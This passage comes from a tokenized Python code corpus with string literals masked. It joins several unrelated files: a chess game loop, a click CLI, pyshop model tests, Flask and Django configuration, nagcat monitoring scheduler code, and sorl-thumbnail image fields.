print ( ) <EOL> print ( "<STR_LIT>" + move . notation ) <EOL> board . makeMove ( move ) <EOL> def printPointAdvantage ( board ) : <EOL> print ( "<STR_LIT>" + <EOL> str ( board . 
getPointAdvantageOfSide ( board . currentSide ) ) ) <EOL> def undoLastTwoMoves ( board ) : <EOL> if len ( board . history ) >= <NUM_LIT:2> : <EOL> board . undoLastMove ( ) <EOL> board . undoLastMove ( ) <EOL> def startGame ( board , playerSide , ai ) : <EOL> parser = InputParser ( board , playerSide ) <EOL> while True : <EOL> print ( board ) <EOL> print ( ) <EOL> if board . isCheckmate ( ) : <EOL> if board . currentSide == playerSide : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> if board . isStalemate ( ) : <EOL> if board . currentSide == playerSide : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> if board . currentSide == playerSide : <EOL> printPointAdvantage ( board ) <EOL> move = None <EOL> command = input ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . lower ( ) <EOL> if command == '<STR_LIT:u>' : <EOL> undoLastTwoMoves ( board ) <EOL> continue <EOL> elif command == '<STR_LIT:?>' : <EOL> printCommandOptions ( ) <EOL> continue <EOL> elif command == '<STR_LIT:l>' : <EOL> printAllLegalMoves ( board , parser ) <EOL> continue <EOL> elif command == '<STR_LIT:r>' : <EOL> move = getRandomMove ( board , parser ) <EOL> elif command == '<STR_LIT>' : <EOL> return <EOL> else : <EOL> move = parser . moveForShortNotation ( command ) <EOL> if move : <EOL> makeMove ( move , board ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> move = ai . getBestMove ( ) <EOL> move . notation = parser . notationForMove ( move ) <EOL> makeMove ( move , board ) <EOL> def main ( ) : <EOL> board = Board ( ) <EOL> playerSide = askForPlayerSide ( ) <EOL> print ( ) <EOL> aiDepth = askForDepthOfAI ( ) <EOL> opponentAI = AI ( board , not playerSide , aiDepth ) <EOL> startGame ( board , playerSide , opponentAI ) </s>
<s> from django . conf import settings <EOL> ANCESTOR_PHRASE = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import click <EOL> from . history import clone <EOL> from . import config <EOL> def validate_remote ( ctx , param , value ) : <EOL> if value : <EOL> try : <EOL> remote , branch = value . split ( '<STR_LIT:/>' ) <EOL> return ( remote , branch ) <EOL> except ValueError : <EOL> raise click . BadParameter ( '<STR_LIT>' ) <EOL> def validate_cols ( ctx , param , value ) : <EOL> if value : <EOL> try : <EOL> validated = { c : index for index , c in enumerate ( value . split ( '<STR_LIT:U+002C>' ) ) if c } <EOL> for col in ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:password>' ) : <EOL> assert col in validated <EOL> return validated <EOL> except ( AttributeError , ValueError ) : <EOL> raise click . BadParameter ( '<STR_LIT>' ) <EOL> except AssertionError as e : <EOL> raise click . BadParameter ( '<STR_LIT>' . format ( e ) ) <EOL> def validate_config ( ctx , param , value ) : <EOL> overrides = { k : v for k , v in ctx . params . items ( ) if v } <EOL> configuration = { } <EOL> configuration . update ( config . DEFAULT ) <EOL> configuration . update ( config . read ( config . HOMEDIR , '<STR_LIT>' ) ) <EOL> configuration . update ( config . read ( configuration [ '<STR_LIT:path>' ] ) ) <EOL> if value : <EOL> configuration . update ( config . read ( value ) ) <EOL> configuration . update ( overrides ) <EOL> if config . is_repo_url ( configuration [ '<STR_LIT:path>' ] ) is True : <EOL> temporary_path = clone ( configuration [ '<STR_LIT:path>' ] , depth = "<STR_LIT:1>" ) <EOL> configuration . update ( config . read ( temporary_path ) ) <EOL> configuration [ '<STR_LIT:path>' ] = temporary_path <EOL> configuration = config . setup_crypt ( configuration ) <EOL> return configuration </s>
<s> from . case import ModelTestCase <EOL> from . import setUpModule , tearDownModule <EOL> class GroupTestCase ( ModelTestCase ) : <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Group <EOL> grp = Group . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( grp , Group ) <EOL> self . assertEqual ( grp . name , u'<STR_LIT>' ) <EOL> class UserTestCase ( ModelTestCase ) : <EOL> def test_by_login_ok_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' , local = False ) <EOL> self . assertIsInstance ( user , User ) <EOL> self . assertEqual ( user . login , u'<STR_LIT>' ) <EOL> def test_by_login_ko_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_login_ok_local ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_login ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( user , User ) <EOL> def test_by_credentials_ko_unexists ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , u"<STR_LIT>" ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_credentials_ko_mirrored ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( user , None ) <EOL> def test_by_credentials_ko_password ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIsNone ( user ) <EOL> def test_by_credentials_ok ( self ) : <EOL> from pyshop . models import User <EOL> user = User . by_credentials ( self . session , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIsInstance ( user , User ) <EOL> self . assertEqual ( user . login , u'<STR_LIT>' ) <EOL> self . 
assertEqual ( user . name , u'<STR_LIT>' ) <EOL> def test_hash_password ( self ) : <EOL> from pyshop . models import User <EOL> u = User ( login = u'<STR_LIT>' , password = u'<STR_LIT>' ) <EOL> self . assertNotEqual ( u . password , u'<STR_LIT>' , '<STR_LIT>' ) <EOL> class ClassifierTestCase ( ModelTestCase ) : <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Classifier <EOL> clsfier = Classifier . by_name ( self . session , <EOL> u'<STR_LIT>' ) <EOL> self . assertIsInstance ( clsfier , Classifier ) <EOL> self . assertEqual ( clsfier . category , u'<STR_LIT>' ) <EOL> self . assertEqual ( clsfier . name , u'<STR_LIT>' ) <EOL> parent = Classifier . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( clsfier . parent_id , parent . id ) <EOL> self . assertEqual ( sorted ( [ c . shortname for c in parent . childs ] ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> class PackageTestCase ( ModelTestCase ) : <EOL> def test_versions ( self ) : <EOL> from pyshop . models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkg , Package ) <EOL> self . assertEqual ( pkg . id , <NUM_LIT:1> ) <EOL> self . assertEqual ( pkg . versions , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_by_name ( self ) : <EOL> from pyshop . models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkg , Package ) <EOL> self . assertEqual ( pkg . id , <NUM_LIT:1> ) <EOL> self . assertEqual ( pkg . name , u'<STR_LIT>' ) <EOL> def test_by_owner ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . by_owner ( self . session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_by_maintainer ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . by_maintainer ( self . 
session , u'<STR_LIT>' ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' ] ) <EOL> def test_get_locals ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . get_locals ( self . session ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' ] ) <EOL> def test_get_mirrored ( self ) : <EOL> from pyshop . models import Package <EOL> pkges = Package . get_mirrored ( self . session ) <EOL> self . assertIsInstance ( pkges , list ) <EOL> pkges = [ pkg . name for pkg in pkges ] <EOL> self . assertEqual ( pkges , [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> class ReleaseTestCase ( ModelTestCase ) : <EOL> def test_by_version ( self ) : <EOL> from pyshop . models import Release <EOL> release = Release . by_version ( self . session , u'<STR_LIT>' , u'<STR_LIT:1.0>' ) <EOL> self . assertIsInstance ( release , Release ) <EOL> self . assertEqual ( release . package . name , u'<STR_LIT>' ) <EOL> self . assertEqual ( release . version , u'<STR_LIT:1.0>' ) <EOL> def test_by_classifiers ( self ) : <EOL> from pyshop . models import Release <EOL> releases = Release . by_classifiers ( self . session , <EOL> [ u'<STR_LIT>' ] ) <EOL> self . assertIsInstance ( releases , list ) <EOL> releases = [ ( r . package . name , r . version ) for r in releases ] <EOL> self . assertEqual ( releases , [ ( u'<STR_LIT>' , u'<STR_LIT>' ) ] ) <EOL> def test_search_by_author ( self ) : <EOL> from pyshop . models import Release <EOL> releases = Release . search ( self . session , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertIsInstance ( releases , list ) <EOL> releases = [ ( r . package . name , r . version ) for r in releases ] <EOL> self . assertEqual ( releases , [ ( u'<STR_LIT>' , u'<STR_LIT>' ) ] ) <EOL> def test_sorted_releases ( self ) : <EOL> from pyshop . 
models import Package <EOL> pkg = Package . by_name ( self . session , u'<STR_LIT>' ) <EOL> self . assertEqual ( [ release . version for release in pkg . sorted_releases ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class ReleaseFileTestCase ( ModelTestCase ) : <EOL> def test_by_release ( self ) : <EOL> from pyshop . models import ReleaseFile <EOL> files = ReleaseFile . by_release ( self . session , u'<STR_LIT>' , <EOL> u'<STR_LIT:1.0>' ) <EOL> self . assertIsInstance ( files , list ) <EOL> files = [ f . filename for f in files ] <EOL> self . assertEqual ( files , [ u'<STR_LIT>' ] ) <EOL> def by_filename ( self ) : <EOL> from pyshop . models import ReleaseFile <EOL> file = ReleaseFile . by_filename ( self . session , u'<STR_LIT>' , <EOL> u'<STR_LIT>' ) <EOL> self . assertIsInstance ( file , ReleaseFile ) <EOL> self . assertEqual ( file . release . package . name , u'<STR_LIT>' ) <EOL> self . assertEqual ( file . release . version , u'<STR_LIT>' ) <EOL> self . assertEqual ( file . package_type , u'<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> class BaseConf ( object ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = True <EOL> SECRET_KEY = None <EOL> SERVER_NAME = None <EOL> ASSETS_DEBUG = False <EOL> FLASK_ASSETS_USE_S3 = False <EOL> FLASK_ASSETS_USE_CDN = False <EOL> MAIL_SERVER = '<STR_LIT:localhost>' <EOL> MAIL_PORT = <NUM_LIT> <EOL> MAIL_USE_TLS = False <EOL> MAIL_USE_SSL = False <EOL> MAIL_DEBUG = False <EOL> MAIL_USERNAME = None <EOL> MAIL_PASSWORD = None <EOL> MAIL_DEFAULT_SENDER = None <EOL> MAIL_MAX_EMAILS = None <EOL> MAIL_ASCII_ATTACHMENTS = False <EOL> SQLALCHEMY_DATABASE_URI = None <EOL> class Prod ( BaseConf ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = False <EOL> class Dev ( BaseConf ) : <EOL> """<STR_LIT>""" <EOL> DEBUG = True <EOL> SECRET_KEY = "<STR_LIT>" </s>
<s> import time <EOL> try : <EOL> import MySQLdb <EOL> except ImportError : <EOL> MySQLdb = None <EOL> from nagcat import log , merlintest , nagios <EOL> def available ( ) : <EOL> """<STR_LIT>""" <EOL> return MySQLdb is not None <EOL> class NagcatMerlin ( nagios . NagcatNagios ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , nagios_cfg , merlin_db_info = { } , ** kwargs ) : <EOL> assert available ( ) <EOL> nagios . NagcatNagios . __init__ ( self , config , nagios_cfg , ** kwargs ) <EOL> self . _test_index = <NUM_LIT:0> <EOL> self . _merlin_db_info = merlin_db_info <EOL> self . _peer_id = None <EOL> self . _peer_id_timestamp = None <EOL> self . _num_peers = None <EOL> self . _update_peer_id ( ) <EOL> def new_test ( self , config ) : <EOL> new = merlintest . MerlinTest ( self , config , self . _test_index ) <EOL> self . _test_index += <NUM_LIT:1> <EOL> self . register ( new ) <EOL> if self . trend : <EOL> self . trend . setup_test_trending ( new , config ) <EOL> return new <EOL> def _set_peer_id_and_timestamp ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> db = MySQLdb . connect ( <EOL> user = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> host = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> passwd = self . _merlin_db_info [ '<STR_LIT>' ] , <EOL> db = self . _merlin_db_info [ '<STR_LIT>' ] ) <EOL> curs = db . cursor ( ) <EOL> num_rows = curs . execute ( <EOL> """<STR_LIT>""" ) <EOL> self . _num_peers = num_rows <EOL> log . debug ( "<STR_LIT>" , self . _num_peers ) <EOL> for i in range ( num_rows ) : <EOL> row = curs . fetchone ( ) <EOL> if row [ <NUM_LIT:0> ] == "<STR_LIT:localhost>" : <EOL> self . _peer_id = row [ <NUM_LIT:5> ] <EOL> self . _peer_id_timestamp = time . time ( ) <EOL> log . debug ( ( "<STR_LIT>" , <EOL> str ( self . _peer_id ) ) + <EOL> ( "<STR_LIT>" , <EOL> self . _peer_id_timestamp ) ) <EOL> except MySQLdb . Error , e : <EOL> log . error ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . 
args [ <NUM_LIT:1> ] ) ) <EOL> def _update_peer_id ( self ) : <EOL> log . debug ( "<STR_LIT>" , <EOL> self . _merlin_db_info ) <EOL> if self . _peer_id and self . _peer_id_timestamp : <EOL> if time . time ( ) - self . _peer_id_timestamp >= <NUM_LIT> : <EOL> self . _set_peer_id_and_timestamp ( ) <EOL> else : <EOL> return <EOL> else : <EOL> if self . _merlin_db_info : <EOL> self . _set_peer_id_and_timestamp ( ) <EOL> def get_peer_id_num_peers ( self ) : <EOL> self . _update_peer_id ( ) <EOL> return self . _peer_id , self . _num_peers </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import random <EOL> from collections import defaultdict , deque <EOL> from itertools import chain <EOL> from twisted . internet import defer , reactor , task <EOL> try : <EOL> from lxml import etree <EOL> except ImportError : <EOL> etree = None <EOL> from nagcat import log , monitor_api , query , test , trend <EOL> from nagcat . runnable import Runnable , RunnableGroup <EOL> class SchedulerPage ( monitor_api . XMLPage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler ) : <EOL> super ( SchedulerPage , self ) . __init__ ( ) <EOL> self . scheduler = scheduler <EOL> def xml ( self , request ) : <EOL> sch = etree . Element ( "<STR_LIT>" , version = "<STR_LIT:1.0>" ) <EOL> data = self . scheduler . stats ( ) <EOL> lat = etree . SubElement ( sch , "<STR_LIT>" , <EOL> period = str ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) ) <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> etree . SubElement ( lat , "<STR_LIT>" ) . text = "<STR_LIT>" % data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> tasks = etree . SubElement ( sch , '<STR_LIT>' , <EOL> count = str ( data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) ) <EOL> for task_type in data [ '<STR_LIT>' ] : <EOL> if task_type == "<STR_LIT:count>" : <EOL> continue <EOL> task_node = etree . SubElement ( tasks , task_type , <EOL> count = str ( data [ '<STR_LIT>' ] [ task_type ] [ '<STR_LIT:count>' ] ) ) <EOL> for sub_type in data [ '<STR_LIT>' ] [ task_type ] : <EOL> if sub_type == "<STR_LIT:count>" : <EOL> continue <EOL> etree . 
SubElement ( task_node , task_type , type = sub_type , <EOL> count = str ( data [ '<STR_LIT>' ] [ task_type ] [ sub_type ] [ '<STR_LIT:count>' ] ) ) <EOL> return sch <EOL> class Scheduler ( object ) : <EOL> """<STR_LIT>""" <EOL> trend = None <EOL> monitor = None <EOL> def __init__ ( self , <EOL> config = None , <EOL> rradir = None , <EOL> rrdcache = None , <EOL> monitor_port = None , <EOL> default_timeout = <NUM_LIT:15> , <EOL> ** kwargs ) : <EOL> self . _registered = set ( ) <EOL> self . _group_index = defaultdict ( set ) <EOL> self . _startup = True <EOL> self . _shutdown = None <EOL> self . _latency = deque ( [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> self . _latency_call = None <EOL> self . _task_stats = { <EOL> '<STR_LIT:count>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:count>' : <NUM_LIT:0> } , <EOL> } <EOL> self . default_timeout = default_timeout <EOL> if monitor_port : <EOL> self . _monitor_port = monitor_port <EOL> self . monitor = monitor_api . MonitorSite ( ) <EOL> page = SchedulerPage ( self ) <EOL> self . monitor . includeChild ( "<STR_LIT>" , page ) <EOL> if rradir : <EOL> self . trend = trend . TrendMaster ( rradir , rrdcache ) <EOL> self . query = query . QueryManager ( self ) <EOL> self . build_tests ( config , ** kwargs ) <EOL> def build_tests ( self , config , ** kwargs ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def new_test ( self , config ) : <EOL> new = test . Test ( self , config ) <EOL> self . register ( new ) <EOL> if self . trend : <EOL> self . trend . setup_test_trending ( new , config ) <EOL> return new <EOL> def new_query ( self , config , qcls = None ) : <EOL> return self . query . new_query ( config , qcls ) <EOL> def register ( self , task ) : <EOL> """<STR_LIT>""" <EOL> assert self . _startup <EOL> assert task not in self . _group_index <EOL> assert isinstance ( task , Runnable ) <EOL> log . 
trace ( "<STR_LIT>" , task ) <EOL> task_deps = task . getAllDependencies ( ) <EOL> all_groups = chain . from_iterable ( self . _group_index [ d ] <EOL> for d in task_deps ) <EOL> groups = set ( g for g in all_groups if g . repeat == task . repeat ) <EOL> update_index = set ( task_deps ) <EOL> update_index . add ( task ) <EOL> if not groups : <EOL> group = RunnableGroup ( [ task ] , task . repeat ) <EOL> self . _update_stats ( group ) <EOL> self . _registered . add ( group ) <EOL> log . trace ( "<STR_LIT>" , group ) <EOL> else : <EOL> group = groups . pop ( ) <EOL> group . addDependency ( task ) <EOL> log . trace ( "<STR_LIT>" , group ) <EOL> for extra_group in groups : <EOL> self . _update_stats ( extra_group , - <NUM_LIT:1> ) <EOL> self . _registered . remove ( extra_group ) <EOL> group . addDependencies ( extra_group ) <EOL> update_index . update ( extra_group . getAllDependencies ( ) ) <EOL> log . trace ( "<STR_LIT>" , extra_group ) <EOL> for runnable in update_index : <EOL> if not self . _group_index [ runnable ] : <EOL> self . _update_stats ( runnable ) <EOL> self . _group_index [ runnable ] . add ( group ) <EOL> self . _group_index [ runnable ] . difference_update ( groups ) <EOL> def stats ( self ) : <EOL> """<STR_LIT>""" <EOL> data = { '<STR_LIT>' : self . _task_stats } <EOL> data [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : max ( self . _latency ) , <EOL> '<STR_LIT>' : min ( self . _latency ) , <EOL> '<STR_LIT>' : sum ( self . _latency ) / len ( self . _latency ) , <EOL> } <EOL> return data <EOL> def _update_stats ( self , runnable , inc = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _task_stats [ '<STR_LIT:count>' ] += inc <EOL> if runnable . type in self . _task_stats : <EOL> self . _task_stats [ runnable . type ] [ '<STR_LIT:count>' ] += inc <EOL> else : <EOL> self . _task_stats [ runnable . type ] = { '<STR_LIT:count>' : inc } <EOL> if runnable . name : <EOL> if runnable . name in self . _task_stats [ runnable . 
type ] : <EOL> self . _task_stats [ runnable . type ] [ runnable . name ] [ '<STR_LIT:count>' ] += inc <EOL> else : <EOL> self . _task_stats [ runnable . type ] [ runnable . name ] = { '<STR_LIT:count>' : inc } <EOL> def _log_stats ( self ) : <EOL> """<STR_LIT>""" <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> log . info ( "<STR_LIT>" , self . _task_stats [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] ) <EOL> for query_type , query_info in self . _task_stats [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if query_type == "<STR_LIT:count>" : <EOL> continue <EOL> log . info ( "<STR_LIT>" , query_type , query_info [ '<STR_LIT:count>' ] ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _startup and not self . _shutdown <EOL> self . _startup = False <EOL> self . _shutdown = deferred = defer . Deferred ( ) <EOL> del self . _group_index <EOL> if not self . _registered : <EOL> self . stop ( ) <EOL> return deferred <EOL> if self . monitor : <EOL> reactor . listenTCP ( self . _monitor_port , self . monitor ) <EOL> self . _log_stats ( ) <EOL> host_groups = { } <EOL> for runnable in self . _registered : <EOL> runnable . finalize ( ) <EOL> if runnable . host in host_groups : <EOL> host_groups [ runnable . host ] . append ( runnable ) <EOL> else : <EOL> host_groups [ runnable . host ] = [ runnable ] <EOL> for host_name , host_group in host_groups . iteritems ( ) : <EOL> log . debug ( "<STR_LIT>" , host_name ) <EOL> slot = <NUM_LIT> / len ( host_group ) <EOL> assert slot <EOL> delay = random . random ( ) * slot <EOL> for runnable in host_group : <EOL> self . schedule ( runnable , delay ) <EOL> delay += slot <EOL> self . _latency_call = reactor . callLater ( <NUM_LIT:1.0> , self . latency , time . time ( ) ) <EOL> log . 
info ( "<STR_LIT>" ) <EOL> return deferred <EOL> def schedule ( self , runnable , delay = None ) : <EOL> """<STR_LIT>""" <EOL> if delay is None : <EOL> delay = runnable . repeat <EOL> if not delay : <EOL> log . error ( "<STR_LIT>" , runnable ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" , runnable , delay ) <EOL> deferred = task . deferLater ( reactor , delay , runnable . start ) <EOL> deferred . addBoth ( lambda x : self . schedule ( runnable ) ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _shutdown <EOL> if self . _latency_call : <EOL> self . _latency_call . cancel ( ) <EOL> self . _latency_call = None <EOL> deferred = self . _shutdown <EOL> self . _shutdown = None <EOL> deferred . callback ( None ) <EOL> def latency ( self , last ) : <EOL> now = time . time ( ) <EOL> self . _latency_call = reactor . callLater ( <NUM_LIT:1.0> , self . latency , now ) <EOL> latency = now - last - <NUM_LIT:1.0> <EOL> self . _latency . append ( latency ) <EOL> if latency > <NUM_LIT> : <EOL> log . error ( "<STR_LIT>" % latency ) <EOL> elif latency > <NUM_LIT> : <EOL> log . warn ( "<STR_LIT>" % latency ) </s>
<s> from twisted . trial import unittest <EOL> from nagcat import simple <EOL> from coil . struct import Struct <EOL> class BaseTestCase ( unittest . TestCase ) : <EOL> def testBasic ( self ) : <EOL> config = Struct ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : "<STR_LIT>" , <EOL> '<STR_LIT:data>' : "<STR_LIT>" , <EOL> } , <EOL> } , <EOL> } ) <EOL> b = simple . NagcatSimple ( config , test_name = "<STR_LIT>" ) <EOL> return b . start ( ) </s>
<s> from django . db import models <EOL> from railroad . viewhosts . views import slugify <EOL> class Service ( models . Model ) : <EOL> host = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> service = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> start = models . IntegerField ( ) <EOL> end = models . IntegerField ( ) <EOL> uniq = models . IntegerField ( ) <EOL> def __unicode__ ( self ) : <EOL> return slugify ( self . host + self . service ) <EOL> def __repr__ ( self ) : <EOL> return slugify ( '<STR_LIT>' + self . host + self . service + '<STR_LIT>' ) <EOL> class ConfiguratorPage ( models . Model ) : <EOL> link = models . CharField ( max_length = <NUM_LIT:20> ) <EOL> services = models . ManyToManyField ( Service ) <EOL> creation = models . DateTimeField ( '<STR_LIT>' ) <EOL> user = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> description = models . CharField ( max_length = <NUM_LIT:1000> , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return self . link <EOL> def save_services ( self , service_dict ) : <EOL> for s in service_dict : <EOL> if not s : <EOL> continue <EOL> host = s [ '<STR_LIT:host>' ] <EOL> service = s [ '<STR_LIT>' ] <EOL> if s . has_key ( '<STR_LIT:start>' ) : <EOL> start = s [ '<STR_LIT:start>' ] <EOL> else : <EOL> start = <NUM_LIT:0> <EOL> if s . has_key ( '<STR_LIT:end>' ) : <EOL> end = s [ '<STR_LIT:end>' ] <EOL> else : <EOL> end = <NUM_LIT:0> <EOL> if s . has_key ( '<STR_LIT>' ) : <EOL> uniq = s [ '<STR_LIT>' ] <EOL> else : <EOL> uniq = <NUM_LIT:0> <EOL> self . services . create ( host = host , service = service , <EOL> start = start , end = end , uniq = uniq ) <EOL> def load_services ( self ) : <EOL> service_list = [ ] <EOL> for s in self . services . all ( ) : <EOL> host = s . host <EOL> servicename = s . service <EOL> start = s . start <EOL> end = s . end <EOL> uniq = s . 
uniq <EOL> service = { <EOL> "<STR_LIT:host>" : host , <EOL> "<STR_LIT>" : servicename , <EOL> "<STR_LIT:start>" : start , <EOL> "<STR_LIT:end>" : end , <EOL> "<STR_LIT>" : uniq , <EOL> } <EOL> service_list . append ( service ) <EOL> return service_list <EOL> def num_services ( self ) : <EOL> return len ( self . load_services ( ) ) </s>
<s> from __future__ import with_statement , unicode_literals <EOL> from django . db import models <EOL> from django . db . models import Q <EOL> from django import forms <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from sorl . thumbnail import default <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class ImageField ( models . ImageField ) : <EOL> def delete_file ( self , instance , sender , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> file_ = getattr ( instance , self . attname ) <EOL> query = Q ( ** { self . name : file_ . name } ) & ~ Q ( pk = instance . pk ) <EOL> qs = sender . _default_manager . filter ( query ) <EOL> if ( file_ and file_ . name != self . default and not qs ) : <EOL> default . backend . delete ( file_ ) <EOL> elif file_ : <EOL> file_ . close ( ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : ImageFormField } <EOL> defaults . update ( kwargs ) <EOL> return super ( ImageField , self ) . formfield ( ** defaults ) <EOL> def save_form_data ( self , instance , data ) : <EOL> if data is not None : <EOL> setattr ( instance , self . name , data or '<STR_LIT>' ) <EOL> def south_field_triple ( self ) : <EOL> from south . modelsinspector import introspector <EOL> cls_name = '<STR_LIT>' % ( self . __class__ . __module__ , self . __class__ . __name__ ) <EOL> args , kwargs = introspector ( self ) <EOL> return ( cls_name , args , kwargs ) <EOL> class ImageFormField ( forms . FileField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> } <EOL> def to_python ( self , data ) : <EOL> """<STR_LIT>""" <EOL> f = super ( ImageFormField , self ) . to_python ( data ) <EOL> if f is None : <EOL> return None <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> with open ( data . temporary_file_path ( ) , '<STR_LIT:rb>' ) as fp : <EOL> raw_data = fp . read ( ) <EOL> elif hasattr ( data , '<STR_LIT>' ) : <EOL> raw_data = data . 
read ( ) <EOL> else : <EOL> raw_data = data [ '<STR_LIT:content>' ] <EOL> if not default . engine . is_valid_image ( raw_data ) : <EOL> raise forms . ValidationError ( self . default_error_messages [ '<STR_LIT>' ] ) <EOL> if hasattr ( f , '<STR_LIT>' ) and callable ( f . seek ) : <EOL> f . seek ( <NUM_LIT:0> ) <EOL> return f </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> from django . core . files . storage import FileSystemStorage <EOL> class MockLoggingHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . reset ( ) <EOL> super ( MockLoggingHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> def emit ( self , record ) : <EOL> self . messages [ record . levelname . lower ( ) ] . append ( record . getMessage ( ) ) <EOL> def reset ( self ) : <EOL> self . messages = { '<STR_LIT>' : [ ] , '<STR_LIT:info>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT:error>' : [ ] , '<STR_LIT>' : [ ] } <EOL> slog = logging . getLogger ( '<STR_LIT>' ) <EOL> class TestStorageMixin ( object ) : <EOL> def open ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . open ( name , * args , ** kwargs ) <EOL> def save ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . save ( name , * args , ** kwargs ) <EOL> def get_valid_name ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( 